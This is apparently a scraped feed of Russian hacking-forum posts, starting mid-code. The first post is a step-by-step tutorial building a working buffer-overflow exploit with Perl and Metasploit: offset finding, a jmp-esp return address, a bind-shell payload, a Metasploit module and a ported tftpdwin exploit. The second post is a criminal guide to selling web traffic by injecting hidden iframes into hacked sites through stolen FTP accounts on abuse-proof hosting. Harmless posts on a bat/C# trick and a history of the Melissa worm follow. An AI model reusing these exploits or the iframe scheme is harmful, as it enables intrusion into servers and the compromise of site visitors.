&quot;[+] Connecting to $host on port $port\n&quot;;</p> <p>connect(SOCKET, $paddr) or die &quot;connect: $!&quot;;<br /></p> <p>print &quot;[+] Sending payload\n&quot;;</p> <p>print SOCKET $junk.&quot;\n&quot;;<br /></p> <p>print &quot;[+] Payload sent\n&quot;;<br /></p> <p>close SOCKET or die &quot;close: $!&quot;;</p> <p>Скрипт просто соединяется с сервером и посылает ему строку символов &quot;А&quot; длиной 1000 ($junk = &quot;\x41&quot; x1000). Чтобы наглядно посмотреть, что в момент получения такой строки происходит внутри нашего сервера, запускаем его под отладчиком – идеально, под OllyDbg. Выбираем наш бинарник через меню &quot;File -&gt; Open&quot; и отдаем команду на выполнение: &quot;Debug -&gt; Restart -&gt; Run&quot;. Далее запускаем простенький сплоит, который, как и следовало ожидать, убивает наш сервер наповал. Смотрим в отладчик - адрес возврата из функции pf (и, как следствие, регистр EIP, указывающий на следующую инструкцию) оказывается перезаписанным значением 41414141 (как ты помнишь, 0х41 - это символ А). Но на момент, когда мы будем глядеть в отладчик, уже произойдет возврат по адресу 41414141, и мы будем видеть только EIP. Для успешной эксплуатации уязвимости нужно построить ядовитую строку так, чтобы она переписывала адрес возврата нужным нам значением - адресом нашего шелл-кода. Поэтому сначала необходимо выяснить, какие именно символы строки затирают адрес возврата. В этом поможет одна из утилит Metasploit Framework. Но перед этим предлагаю тебе быстренько ознакомиться с Фреймворком.</p> <p><span style="color: red"><strong>Используем Metasploit для разработки эксплоита</strong></span></p> <p>Символов в передаваемой строке 1000, все они одинаковые, поэтому неудивительно, что в строке возврата появляется значение, состоящее из буквы A. Но если составить строку, которая будет состоять из неповторяющихся буквенно-числовых строк, то легко определить позицию тех символов, которые попадают в адрес возврата. Генерацией такой строки как раз и занимается утилита, входящая в состав Metasploit, pattern_gererate. В качестве единственного обязательного параметра передается длина строки. Итак, создадим буфер длиной в 1000 символов для дальнейшего использования в нашем сплоите:</p> <p>msf &gt; ruby pattern_create.rb 1000</p> <p>Aa0Aa1Aa2Aa3 [967 символов вырезано злым редактором] Bh0Bh1Bh2Bh</p> <p>А в скрипте заменим значение переменной $junk на вышеприведенную последовательность. Заново запускаем наш уязвимый сервер, подключаемся к нему в OllyDbg и запускаем эксплоит. Сервер опять падает. Что ж, давай взглянем, что на этот раз оказалось в регистре EIP? EIP = 41387141. Чтобы определить смещение символов в строке, используем другую утилиту из набора Metasploit - pattern_offset, передавая в параметрах искомую величину и длину буфера:</p> <p>my $totalbuffer = 1000;</p> <p># длина буфера</p> <p>my $junk = &quot;\x41&quot; x 504;</p> <p># первые 504 символа &quot;А&quot;</p> <p>my $eipoverwrite = &quot;\x42&quot; x 4; </p> <p># 4 символа &quot;В&quot;, которые перезапишут адрес возврата</p> <p>my $junk2 = &quot;\x43&quot; x ($totalbuffer-length($junk.$eipoverwrite));</p> <p># оставшееся место в буфере заполняем символами &quot;С&quot;</p> <p>И заменяем строчку кода, отправляющую сформированную строку в сокет, на:</p> <p>print SOCKET $junk.$eipoverwrite.$junk2.&quot;\n&quot;;</p> <p>Чтобы проверить, запускаем эксплоит и смотрим в отладчик. Ага, так и есть: EIP = 42424242. Увы, тысячи символов слишком мало, чтобы уместить шелл-код, поэтому попробуем увеличить длину ядовитой строки и посмотреть, как будет работать сплоит. Длину выбираем экспериментально: методом проб и ошибок. После увеличения длины с 1000 до 2000 (my $totalbuffer = 2000) убеждаемся, что сплоит по-прежнему работает так же успешно. А это значит, мы имеем 2000-4-504=1492 байта для размещения нашего шелл-кода. Все это прекрасно, но как передать управление шелл-коду – ведь его адреса мы не знаем! Давай посмотрим, что у нас происходит со стеком в момент переполнения. Поставим в отладчике бряк на функцию strcpy:</p> <p>0040130B: CALL 00404351</p> <p>И запускаем эксплоит. Бряк сработал, – смотрим, что в стеке (в olly стек показывается в правом нижнем углу и имеет формат &quot;адрес - значение – комментарий; типа return to kernel32.728232&quot;):</p> <p>[buf][ebp][ret][предыдущий стековый фрейм]</p> <p>Нажимаем &lt;F8&gt; (перейти на следующую инструкцию) и отмечаем изменения в стеке:</p> <p>[buf][ebp][ret][предыдущий стековый фрейм]</p> <p>[AAAAAAAA][BBB][CCCCCCCC…]</p> <p>Теперь взглянем на конец функции pf:</p> <p>00401313 POP EDI</p> <p>00401314 POP ESI</p> <p>00401315 LEAVE</p> <p>00401316 RETN</p> <p>При вызове команды LEAVE происходит следующее:</p> <p>MOV ESP, EBP //теперь в ESP содержится адрес [ebp]</p> <p>POP EBP // в EBP заносится значение из [ebp] (эта область у нас перезаписана <br />символами &quot;А&quot;, следовательно, EBP будет равен 41414141), ESP теперь указывает на <br />адрес возврата.</p> <p>При выполнении команды RETN из стека выталкивается адрес возврата – поэтому получается, что ESP указывает на начало стекового фрейма, то есть на $junk2, где мы и будем размещать наш шелл-код. А как перейти по адресу, лежащему в esp? Хороший вопрос!</p> <p>Переход к ESP – вполне обычное действие для виндовых приложений. Более того, любое такое приложение использует, как минимум, одну системную DLL’ку, в которых есть инструкции на любой вкус. Адреса в таких DLL'ках, как правило, статичны и не изменяются! Получается, если найти инструкцию перехода на ESP (а это либо jmp esp, либо push esp + ret, либо call esp), взять ее адрес и заменить им адрес возврата, то на выходе из функции управление передастся на ESP – прямиком нашему шелл-коду.</p> <p>Есть один момент, который стоит упомянуть! Адрес возврата не должен содержать нулевых байтов, ведь функция strcpy воспримет все как признак конца строки и не скопирует оставшуюся часть буфера, то есть $junk2, куда мы хотели разместить шелл-код. Поэтому мы будем искать инструкцию перехода по esp в динамических библиотеках, используемых приложением, так как адрес такой инструкции в библиотеках будет выше, и не будет занимать все четыре байта – исключая возможность появления нуля в начале.</p> <p>Осуществлять поиск будем с помощью полезной утилиты findjmp, входящей в состав пакета тулз MSF eXploit Builder – он нам понадобится и позже. Прога ищет адрес команды call, jmp, push + регистр и ret в dll или приложении. Наша программа работает с сокетами, и значит, она будет использовать стандартную виндовую библиотеку ws2_32.dll. Посмотрим, есть ли там интересующий нас опкод (то есть машинные инструкции, соответствующие передаче управления на ESP). Запускаем с указанием, во-первых, библиотеки для поиска, и, во-вторых, нужного регистра:</p> <p>Findjmp2.exe ws2_32.dll esp</p> <p>Scanning ws2_32.dll for code useable with the esp register</p> <p>0x71AB9372 push esp - ret</p> <p>Finished Scanning ws2_32.dll for code useable with the esp register</p> <p>Found 1 usable addresses</p> <p>Найден один подходящий нам адрес - 0x71AB9372. Кстати, если вдруг нужного опкода в другой ситуации не найдется – не беда, можно поискать в kernel32.dll, которая используется всеми приложениями. Аналогичный поиск по этой библиотеке дает еще два подходящих адреса. В действительности, это не самый удачный вариант и искать опкоды в системных библиотеках стоит в самом последнем случае. Дело в том, что библиотеки различаются от системе к системе и даже от версии сервиспака, установленного в винде. Адрес 0x71AB9372 действителен только для английской Windows XP SP2 – для другой системы он будет другой! Именно поэтому подходящие опкоды стоит искать в DLL'ках, которые устанавливает в систему сама программа – только в этом случае есть шанс написать независящий от версии Windows сплоит. В нашем случае, увы, такой вариант невозможен в виду простоты примера, но свои динамические библиотеки для реального виндового приложения – это в большинстве случаев норма.</p> <p>Осталось только создать шелл-код. Как я уже говорил, к сплоиту предъявляется одно важное требование - он не должен содержать нулевых байтов. В программе копируется строка, и если встретится &quot;0&quot;, он будет воспринят как конец строки. Соответственно, оставшаяся часть строки не скопируется, а неполный шелл-код, естественно, не будет работать. В создании шелл-кода нам опять поможет Metasploit и консольный интерфейс для управления фреймворком. Итак, запускаем консоль tools/msfconsole и вводим следующее:</p> <p>msf &gt; use windows/shell_bind_tcp // будем использовать этот payload</p> <p>msf payload(shell_bind_tcp) &gt; set LPORT 5555 // устанавливаем значение порта на <br />удаленной машине</p> <p>LPORT =&gt; 5555</p> <p>С помощью команды &quot;generate -h&quot; посмотрим опции, которые можно указать для генерации шелл-кода:<br />-b &lt;opt&gt; - список символов, которые следует исключить из шелл-кода;<br />-f &lt;opt&gt; - имя файла, куда сохраняется шелл-код;<br />-t &lt;opt&gt; - тип шелл-кода: ruby, perl, c или raw.</p> <p>Указываем, что надо избегать байтов '\x00\xff', генерировать код для Perl'a и сохранить полученные результаты в c:\\shellcode.bin:</p> <p>msf payload(shell_bind_tcp) &gt; generate -b '\x00\xff' -f c:\\shellcode.bin <br />-t perl</p> <p>[*] Writing 1747 bytes to c:\shellcode.bin...</p> <p>Вот теперь, имея на руках шелл-код, настало время собрать полноценный эксплоит. Единственное – нужно помнить несколько моментов:<br />в шелл-коде не должны встречаться 0xff и 0x00 байты, но мы об этом уже позаботились;<br />непосредственно перед шелл-кодом нужно поместить цепочки из NOP (машинная команда - нет операции) – на случай, если мы чуть-чуть накосячили с адресом возврата.</p> <p>Отправляемая серверу строка будем формироваться следующим образом:</p> <p>my $junk = &quot;\x90&quot; x 504; // первые 504 NOP’a</p> <p>#jmp esp (from ws2_32.dll)</p> <p>my $eipoverwrite = pack('V',0x71AB9372); // перезаписываем адрес возврата <br />значением 0x71AB9372</p> <p>#add some NOP's</p> <p>my $shellcode=&quot;\x90&quot; x 50; // добавляем 50 nop-ов перед шелл-кодом</p> <p>// прибавляем сгенерированный нами шелл-код (windows/shell_bind_tcp)</p> <p>$shellcode=$shellcode.&quot;\xbb\x2e\ [и тут тоже кушал редактор ] xd3&quot;; </p> <p>Окончательно строка, отправляемая в сокет:</p> <p>// и отправляем ядовитую строку серверу</p> <p>print SOCKET $junk.$eipoverwrite.$shellcode.&quot;\n&quot;;</p> <p>После чего пытаемся в сплоите установить соединение с удаленной машиной на 5555 порту, который мы указали при генерации шелл-кода:</p> <p>system(&quot;telnet $host 5555&quot;);</p> <p>Запускаем эксплоит и… о чудо, он работает! Протестировав эксплоит на различных ОС (Windows XP SP3), можно увидеть, что значение смещения не меняется - меняется только наш адрес возврата.</p> <p><span style="color: red"><strong>Эксплоит для Metasploit</strong></span></p> <p>Итак, у нас есть сплоит для конкретной платформы с вполне определенной нагрузкой, открывающей в системе шелл. Так зачем нужна вообще какая-либо специальная платформа для создания сплоита, если мы вполне обошлись силами одного лишь Perl'а? Причина в том, что Metasploit предоставляет огромное количество заготовок, реализаций различных протоколов, одну из самых больших баз шелл-кодов, payload-ов, которые можно использовать при написании собственного эксплоита. Вместо убогого скрипта на Perl'е можно написать модуль для Metasploit, после чего запускать его на любой платформе и выбирать payload на свой вкус! Чуешь разницу? Предлагаю прямо сейчас усовершенствовать наш сплоит, переписав его для Metasploit, и посмотреть, как это работает. Само собой, он будет обладать возможностью выбора платформы для атаки, а выбирать пейлоад ты сможешь прямо во время исполнения атаки.</p> <p>Любой эксплоит для Metasploit имеет фиксированную структуру, которая состоит из объявления заголовочных файлов, подключения ядра msf/core, определения класса эксплоита, в котором описывается его функциональность. Я не буду приводить здесь полный исходник модуля, но выкладываю его на диске. Рекомендую для большей ясности открыть его прямо сейчас и далее читать мое практически построчное объяснение его кода.<br />Первое, с чего начинается любой сплоит, – это подключение ядра Metasploit Framework:</p> <p>require 'msf/core'</p> <p>Функциональность любого сплоита описывается с помощью класса, где его настройки задаются с помощью параметров, а функциональность – с помощью методов. Создаваемый объект наследуется от одного из предопределенных классов. Поскольку мы создаем удаленный сплоит, то и наследуем наш объект от родительского класса &quot;Удаленный эксплоит&quot;. В синтаксисе Ruby это делается так: </p> <p>class Metasploit3 &lt; Msf::Exploit::Remote.</p> <p>Большая заслуга Metasploit в том, что он унифицирует большое количество параметров и действий, позволяя использовать готовые конструкции вновь и вновь. Первый элемент разрабатываемого класса – секция include, где мы подключаем обработчик для нужного нам протокола. В Metasploit есть обработчики для http, ftp и других протоколов, что позволяет быстрее писать эксплоиты, не заморачиваясь с их собственной реализацией. Наш эксплоит использует TCP-подключение, поэтому код будет выглядеть следующим образом:</p> <p>include Msf::Exploit::Remote::Tcp</p> <p>Далее весь сплоит делится на два метода: метод инициализации, в котором мы указываем информацию, необходимую для успешного выполнения эксплоита, и метод эксплуатации, в котором мы отправляем на сервер ядовитую строку.</p> <p>Начнем с инициализации. Параметр Payload задает длину ядовитого буфера и недопустимые символы (в нашем случае – 0х00 и 0xff):</p> <p>'Payload' =&gt;</p> <p>{</p> <p>'Space' =&gt; 1400,</p> <p>'BadChars' =&gt; &quot;\x00\xff&quot;,</p> <p>}</p> <p>Далее определяем цели эксплоита и специфичные для каждой цели параметры, такие как адрес возврата, смещение и т.д.:</p> <p>'Platform' =&gt; 'win',</p> <p>'Targets' =&gt;</p> <p>[</p> <p>['Windows XP SP2 En',</p> <p>{ 'Ret' =&gt; 0x0x71ab9372, 'Offset' =&gt; 504 } ],</p> <p>['Windows 2003 Server R2 SP2',</p> <p>{ 'Ret' =&gt; 0x71c02b67, 'Offset' =&gt; 504 } ],<br /></p> <p>... </p> <p>]</p> <p>Обрати внимание, мы не определяем сам шелл-код – то есть, нагрузку, которую выполнит сплоит. Действие на удаленной машине будет выбираться интерактивно во время работы в консоли Metasploit'ом. Сейчас нам остается только написать самое главное - метод для эксплуатации уязвимости. С помощью команды connect устанавливаем TCP-соединение (обработчик протокола мы подключили выше и даже указали порт, помнишь?), далее – определяем ядовитую строку и передаем ее в сокет, после чего разрываем соединение. Ядовитый буфер состоит из цепочки NOP-команд, величины Offset - затем к ней прибавляется адрес возврата, еще небольшая NOP-цепочка и зашифрованный PAYLOAD. Все вместе выглядит так:</p> <p>def exploit</p> <p>connect<br /></p> <p>junk = make_nops(target['Offset'])</p> <p>sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded</p> <p>sock.put(sploit)<br /></p> <p>handler</p> <p>disconnect</p> <p>end</p> <p>Вот и все, наш первый модуль для Metasploit готов! Чтобы его можно было использовать, скопируем исходник в папку modules/exploits/test (если не нравится test – можешь скопировать в windows/misc, например). Запускаем msfconsole и работаем в интерактивной консоли Metasploit'а!</p> <p><span style="color: red"><strong>Эксплоит за 5 минут</strong></span></p> <p>Как видишь, разработать эксплоит для Metasplot не так сложно. Скорее даже наоборот, ведь большая часть работы уже сделана за тебя. Взять хотя бы огромную базу шелл-кодов – попробуй разработать свой. Но лени человеческой нет предела, поэтому в стремлении еще больше упростить процесс был разработан пакет утилит тебе MSF eXploit Builder. Программа имеет удобный графический интерфейс и поможет по-настоящему быстро создавать новый модуль для Metasploit. Кроме удобного GUI, eXploit Builder включает в себя целую кучу полезных тулз, необходимых для отладки и тестирования эксплоитов. Более того – можно опять же создавать с нуля, а портировать уже существующие сплоиты.</p> <p>Предлагаю взять какой-нибудь эксплоит и с помощью MSF eXploit Builder превратить его в Metasploit-модуль. Ты спросишь, зачем это нам надо? Опять же: превратив его в Metasploit-модуль, мы можем использовать его вместе с различными payload-ами. Проще говоря, это сделает его более универсальным и кроссплатформенным. Сейчас ты сам убедишься, насколько эта программа может упростить жизнь - ведь теперь для написания и отладки эксплоита не нужно даже знание Ruby и Metasploit API. В качестве кролика для эксперимента я выбрал первое, что попалось, - сплоит для tftpdwin 0.42 (milw0rm.com/exploits/7452).</p> <p>Запускаем MSF eXploit Builder, заходим в меню &quot;Editor&quot; и выбираем &quot;New&quot;. Появляется окно с несколькими вкладками (Information, Badchars, Analysis, Shellcode, Design). Переходим на вкладку &quot;Information&quot; и видим много интересных полей. Как ты помнишь, в этой секции указываются цели (OS + SP) и тип/протокол эксплоита (например, remote/tcp). Более того, программа предоставляет нам возможность тестирования и отладки полученного эксплоита, поэтому тут же можно выбрать исполняемый файл и указать параметры для его запуска (порт, ip-адрес).</p> <p>Итак, выбираем наш tftpd.exe, после чего утилита предложит следующие действия на выбор: запустить приложение, запустить его под отладчиком или не запускать вообще – просто запустим приложение. Обрати внимание, что справа сбоку отобразится список загруженных приложением DDL'ек.</p> <p>Теперь начинаем смотреть код сплоита – на наше счастье он предельно понятный. Комментарий &quot;Restricted chars = 0x00 0x6e 0x65 0x74&quot; явно указывает на запрещенные символы – что ж, выставим их в нашей программе. Для этого переходим на вкладку Badchars и в одноименном поле вводим: \x00\x6e\x65\x74. Далее по коду мы видим, как формируется ядовитый пакет:</p> <p>my $packet = (($p1).($nopsled).($shellcode).(($overflow)).($ret).($p2));</p> <p>Разбираемся с каждой составляющей и заодно составляем буфер для отправки во вкладке &quot;Design&quot;. Сначала идет переменная $p1 (my $p1=&quot;\x00\x01&quot;;). Вводим их в поле Value (Operation по умолчанию оставляем RAW). За ней идет переменная $nopsled (my $nopsled = &quot;\x90&quot; x 10;) - выбираем Operation = NOP и устанавливаем длину в 10. Далее располагается $shellcode - устанавливаем Operation = PAYLOAD и Length = 0. Следующая часть - $overflow (my $overflow = “\x41” x $len; строка из символов &quot;А&quot; длиной в $len). Переменная my $len = (274 - length($shellcode)), то есть строка длиной 274 символа минус длина шелл-кода. Выставляем Operation = RAW, Length = 274 и выбираем (нажимаем поочередно) вверху кнопки RAW could be: rand_text_alpha, -payload.encoded.length, что означает: длина строки будет высчитываться по вышеприведенной формуле. Потом добавляем адрес возврата $ret (my $ret = “\x5d\x10\x40”) и выбираем Operation = RET. Наконец, добавляем $p2, равное &quot;\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00&quot; и выбираем Operation = RAW. Ядовитый пакет готов.</p> <p>Собственно, теперь у нас есть все для создания готового сплоита. Поэтому нажимаем на кнопку &quot;Generate&quot; и любуемся кодом получившегося сплоита. Если какие-то моменты вызывают сомнения, тут же можно отредактировать код вручную. Классно, что возможно сразу проверить работоспособность кода – для этого смело жмем кнопку &quot;Test&quot;. И ведь – все работает! За 5 минут, которые ушли на ознакомление с программой, и без всякого знания, как языка Ruby, так и структуры Metasploit, мы создали полностью рабочий сплоит. Это дорогого стоит! В качестве домашнего задания попробуй с помощью MSF eXploit Builder создать эксплоит для нашего сервера :).</p> <p><span style="color: red"><strong>Заключение</strong></span></p> <p>Вот и закончилась наша экскурсия по фабрике эксплоитов. Знать, как устроены сплоиты, полезно во многих отношениях. Не умея прочитать шелл-код в свежем эксплоите или, вообще, запуская непонятный exe'шник, далеко не всегда можно доверять его создателю. Многие сплоиты выпускаются в паблик с отсутствующими частями и специально оставленными ошибками – это непременно остановит армию скрипткидис, но для понимающего человека едва ли станет серьезной задачей. Надеюсь, я сегодня убедил тебя, что ничего нереального в сплоитах нет: ведь хакеры люди – логичные и понятные :).</p> <p><span style="color: red"><strong>INFO</strong></span></p> <p>Подробная информация об Metasploit API:</p> <p>wwwmetasploit.com/documents/api/msfcore/index.html</p> <p>Блог Metasploit Framework:</p> <p>blog.metasploit.com</p> <p>Статья по доработке эксплоита:</p> <p>en.wikibooks.org/wiki/Metasploit/WritingWindowsExploit</p> <p>Видео, показывающее, как создать Portable-версию Metasploit для размещения на флешке:</p> <p>wwwwonderhowto.com/how-to/video/how-to-create-a-metasploit-meterpreter-executable-file-263017</p> <p><span style="color: red"><strong>WARNING</strong></span></p> <p>Информация представлена исключительно в ознакомительных целях, чтобы показать, чего стоят критические уязвимости в коде и как злоумышленники могут их использовать. Не повторяй эти действия в противозаконных целях. В противном случае автор и редакция ответственности не несут!</p> mybb@mybb.ru (administrator) Mon, 07 Mar 2011 23:52:48 +0300 https://forumis.fludilka.su/viewtopic.php?pid=8#p8 https://forumis.fludilka.su/viewtopic.php?pid=7#p7 <p><span style="color: olive">Ввведение</span><br />Я думаю ты не раз встречал топики на форумах, в которых продается\покупается траф, предлагают ддос услуги, продаются сосксы и т.д. Не задумывался ли ты когда-нибудь откуда все это берется, и сколько можно на этом заработать? В этой статье я хочу рассмотреть истоки всего этого, а именно организацию траф сервиса. Что же такое траф? Траф, грубо говоря можно назвать потоком посетителей на ваш сайт. Что же нам понадобится для нашего сервиса?</p> <p><span style="color: green">Основная часть</span></p> <p><span style="color: olive">1) Хостинг</span><br />Прежде всего нам нужен хостинг(аккаунт или сервер, в зависимости от ширины твоего кошелька). Но брать первый попавшийся хост(из обычных, которые предлагают на каждом углу), или устроиться на чужом(взломанном и т.д.) не логично. Почему? Во-первых, админы могут просто обнаружить присутствие постороннего на сервере, во-вторых, приток наших посетителей будет создавать лишнюю нагрузку(если кол-во большое, а сервер слабый), в-третьих, на хост может прийти так называемая абуза(жалоба), последиствием которой станет блокировка аккаунта\домена. Таким образом я предлагаю остановиться на абузоустойчивом хостинге. В чем его преимущества? Данный хостинг создан специально для черных целей, администрация ДЦ, где расположены сервера игнорируют абузы(жалобы), отсюда и название. На данный момент цены на такой хостинг начинаются от 50 $ и заканчиваются парами тысячами $ в месяц(цена зависит от того что вы хотите, какие у вас запросы и т.д.). Если вы хотите серьезно заняться трафом, то советую сразу останавливать свое внимание на проверенных сервисах(смотрите на цены, кол-во отзывов, время работы в данной сфере и т.д.) и не экономьте на этом. Также к этому можно отнести и абузные домены(например в зоне .cn), которые тоже сейчас можно приобрести(средняя цена 20$ в год).</p> <p><span style="color: olive">2) Софт\скрипты</span><br />Ну вот теперь у нас есть свой хост, так что можно смело двигаться дальше. Теперь нам нужен какой-то софт\скрипты для продажи трафа. Допустим наш траф идет к нам на хост wwwsite.ru, а нам нужно к примеру направить 1000 посетителей на сайт wwwsit2.ru как же быть? Для этого были придуманы TDS(системы распределения трафика). В чем заключается их смысл? Весь трафик мы пускаем на нашу TDS, а она уже производит перенаправление трафика на другие сайты. Цены на TDS начинаются от 30$, от чего же зависит цена? От возможностей TDS:определение версий браузеров, определение страны откуда пришел траф, создание различных схем с приоритетами, минимальные потери при перенапрвлении, удобство использования, нагрузка на сервер(например какую базу использует для хранения информации: MySQL\текстовые файлы), реферальная статистика и много другое(обо всем немного позднее).</p> <p><span style="color: olive">3) Где взять траф?</span><br />Теперь когда у нас есть хост и система распределения трафа нужно ответить на самый главный вопрос - а где же взять траф? Есть много различных способов, например рассылка сообщений с ссылкой на ваш сайт по ICQ, e-mail, гостевым книгам, форумам и т.д. Но этот способ не дает хороших результатов, т.к. может лишь дать волну трафа, но не постоянный. Самый известный и распространненый способ это iframe траф. Как же его сделать? Для этого нам понадобится доступ к хорошо посещаемый ресурсам, это может быть взломанный\уганный фтп аккаунт к ресурсу, шелл и т.д. Далее когда у нас есть доступ к ресурсу, нужно как-то незаметно для админов перенаправить посетителей на наш сайт(на TDS). Для этого используются iframe. Ифрейм это небольшое &quot;окно&quot; обычно размером 1 на 1 пиксель, которое не видно человеческому глазу, в этом окне как раз и открывается наш сайт. Iframe имеет такой вид , где в параметре src указывается адресс нашего сайта. Тоесть мы берем данный код и вставляем в страницы сайтов, которые мы взломали\взяли.</p> <p><span style="color: olive">4) Дополнение</span><br />В зависимости от тематики сайтов, с которых идет траф, его можно разделить на разные типы:бизнес(с бизнес сайтов), адалт(с любых порно ресурсов), mix(смешаный, тоесть всего по немногу), также траф можно разделить и по странам. Соответственно чем лучше(качественнее) наш трафик, тем дороже его можно будет продать. Немного вернусь к вопросу про фтп. А что делать если у нас несколько тысяч взломанных фтп и на нам нужно на каждом разместить наш код? Если это делать руками, то на это уйдет неделя&#160; Для таких дел были сделаны специальные фтп checkers/iframers. Их задача как раз и заключается в том, чтобы в автоматическом режиме вставлять нужный нам год в страницы. Также в них присутствуют некоторые доп. функции, например удаление чужих фреймов(а зачем нам конкуренты?&#160; ), проверка сайтов на PR и многое другое. Также хочу отметить, чтобы админы быстро не увидели наши фреймы с своих страницах нужно их шифровать(в принципе этому посвящено немало интересных статей, поройся).</p> <p><span style="color: green">Вывод</span></p> <p><span style="color: olive">1) Итог</span></p> <p>Подведем небольшой итог, у нас есть абузный хост, на нем стоит наша TDS на которую идет траф со взломанных ресурсов. В принципе все готово для продажи трафа, остается найти клиентов и создать схему перенаправления в нашей TDS.</p> <p><span style="color: olive">2) Некоторые тонкости</span><br />Но я хочу остановить еще внимание не некоторых тонкостях, которые сделают вашу жизнь легче&#160; На данный момент на рынке преобладает mix траф, тоесть это траф с сайтов различной тематики, разные страны и т.д. тоесть все свалено в кучу. Когда покупаете\продаете такой траф всегда лучше проводить тест, например 1000-2000 уников. Часто возникают вопросы о различии общего и уникального трафа. Стоит заметить, что человек зайдя на сайт, может просмотреть несколько страниц, а если на каждой висит наш фрейм, то получается что он будет учтен в нашем трафе дважды. Для этого в TDS есть отбор уников, тоесть используются только реальные уникальные посетители(например идентификация по ip). У сайта посещаемость можеть быть 10000 в день, а из них уникальных посетителей только 2000. Также хочу обратить ваше внимание на покупку фтп(так как щас развелось очень много людей продающих фтп в несколько рук). Лучшего всего покупать хорошо посещаемые фтп, лучше взять 4-5 но вы сам увидите эти сайты, чем брать 1500 фтп за 100 $ с которых трафа будет 0, да и их еще продадут в несколько рук. Средний заработок в день скалдывается из кол-ва трафа, который вы имеете в день(учитывается только уникальный). По своему опыту могу сказать, что качественный траф на данный момент имеет высокий спрос, и очень часто чтобы купить траф приходится ждать в очереди по несколько дней. Средняя цена за 1000 уников сейчас от 3-7$ .<br /></p> <p><span style="font-size: 8px">http://forum.xeka.ru/f77/t3546/</span></p> mybb@mybb.ru (administrator) Mon, 07 Mar 2011 23:51:45 +0300 https://forumis.fludilka.su/viewtopic.php?pid=7#p7 https://forumis.fludilka.su/viewtopic.php?pid=6#p6 <p>Маленькая забавность о том, как использовать все возможности dotNet в обычных bat-скриптах. Или сделать скриптовый язык из С#.<br />Далее рассказан простой способ скомпилировать и запустить код С#, который находится внутри bat-файла.</p> <p>Не буду долго томить:</p><div class="quote-box quote-main"><blockquote><p>/* <br />@echo off &amp;&amp; cls<br />set WinDirNet=%WinDir%\Microsoft.NET\Framework<br />IF EXIST &quot;%WinDirNet%\v2.0.50727\csc.exe&quot; set csc=&quot;%WinDirNet%\v2.0.50727\csc.exe&quot;<br />IF EXIST &quot;%WinDirNet%\v3.5\csc.exe&quot; set csc=&quot;%WinDirNet%\v3.5\csc.exe&quot;<br />IF EXIST &quot;%WinDirNet%\v4.0.30319\csc.exe&quot; set csc=&quot;%WinDirNet%\v4.0.30319\csc.exe&quot;<br />%csc% /nologo /out:&quot;%~0.exe&quot; %0 <br />&quot;%~0.exe&quot;<br />del &quot;%~0.exe&quot;<br />exit<br />*/</p> <p>class HelloWorld<br />{<br />static void Main()<br />{<br />System.Console.WriteLine(&quot;Hello, World!\r\nI am at &quot; + System.Environment.Version);<br />System.Console.ReadLine();<br />}<br />}</p></blockquote></div><p>Разберем, как это получается.<br />Сначала работает bat-интерпретатор. Первую строчку скрипта он не понимает и выдает ошибку. Но не страшно, это чисто визуальное неудобство. Подчистим за ним во второй строчке.<br />Далее пытаемся найти каталог с компилятором csc.exe и запускаем его.<br />Компилятор .Net Framework'a, csc в качестве аргумента принимает путь к файлу с исходником. В нашем случае исходник находится в теле bat-файла(строки 13–20). Текст bat-команд игнорируется, как комментарий(строки 1 и 11).<br />После работы компилятора, получаем исполняемый файл, который запускаем и удаляем после завершения его работы.<br />Работа bat-интерпретатора заканчивается на 10 строке (exit).</p> <p>Этот подход работает на Vista/7 «из коробки» и на ХР, с установленным .Net Framework.<br />Целесообразность, конечно, сомнительная. Так, just for fun.</p> <p><span style="font-size: 8px">http://habrahabr.ru/blogs/net/107659/#habracut</span></p> mybb@mybb.ru (administrator) Mon, 07 Mar 2011 23:50:43 +0300 https://forumis.fludilka.su/viewtopic.php?pid=6#p6 https://forumis.fludilka.su/viewtopic.php?pid=5#p5 <p><span style="display: block; text-align: center"><span style="color: yellow"><strong>История зла 1999-2009</strong></span></span></p> <p><span style="display: block; text-align: center">САМАЯ НАШУМЕВШАЯ МАЛВАРЬ ЗА ПОСЛЕДНИЕ 10 ЛЕТ<br />Каждый день — новая зараза. С таким разнообразием всевозможной живности появление новой малвари просто перестаешь замечать. И все-таки, были эпидемии, которые не прошли незамечено. Мы решили вспомнить последние 10 лет и выбрать за каждый год наиболее запомнившуюся заразу.</span></p> <p><span style="color: red"><span style="display: block; text-align: center"><strong>Melissa</strong></span></span></p> <p>Едва ли программист из Нью-Джерси задумывался о том, чтобы собрать ботнет из миллионов машин и использовать его для рассылки спама. Вряд ли он мог представить последствия, создавая своего, казалось бы, безобидного червя Melissa. Ведь даже распространение тот начинал не с инета — впервые червь был обнаружен 26 марта в конференции alt.sex внутри Usenet — в то время еще популярной сети для общения и обмена файлами. К сообщению был приложен файл List.DOC, содержащий пароли на 80 порнушных сайтов: позарившись на «клубничку», файлик с радостью открыли многие. А дальше пошло-поехало: червь тут же начал распространение, отправляя себя по 50 первым контрактам из записной книжки пользователя. Это был первый успешный червь, распространяемый через e-mail.<br />Когда Melissa открывает зараженный документ MS Word 97/2000, запускается специальный макрос, который рассылает копии червя в сообщениях электронной почты при помощи обычного Outlook’а. Для этого червь юзает возможность Visual Basic активизировать другие приложения MS Windows и использовать их процедуры. Вирус вызывает MS Outlook, считывает из адресной книги первые 50 email’ов и посылает по этим адресам сообщения. Написав в мессаге текст аля «Вот документ, о котором ты меня спрашивал», червь приаттачивал к письму текущий открытый документ пользователя, предварительно заражая его. Последнее, кстати, повлекло за собой массу курьезных ситуаций и, в ряде случаев — утечки конфиденциальной информации. В 1999 году пользователи даже не задумывались о том, что в аттаче от известного им адресата может быть какая-то зараза, и активно открывали вложения.<br />Стремительное распространение вируса серьезно нагрузило почтовые серверы — им пришлось обрабатывать на несколько порядков больше отправлений, чем обычно. Тысячи машин по всему миру не выдержали нагрузки и вышли из строя. К 27 марта распространение вируса приняло характер эпидемии; 29 марта он проник уже на компьютеры всех стран мира, подключенных к Сети, в том числе и на российские.<br />Найденному силами ФБР Девиду Смиту, который и написал те три десятка строк кода на VB, грозили 10 лет тюрьмы, но парень «легко отделался», получив 20 месяцев заключения и штраф в $5000. Однако исходники червя еще долго мусолили хакеры, плодя различные модификации Melissa.<br /><img class="postimg" loading="lazy" src="https://i082.radikal.ru/1008/e0/cc4a6ddf12a2.bmp" alt="http://i082.radikal.ru/1008/e0/cc4a6ddf12a2.bmp" /><br />весь код Melissa умещался в 100 строчках</p> <p><span style="color: red"><span style="display: block; text-align: center"><strong>Loveletter</strong></span></span></p> <p>В следующем 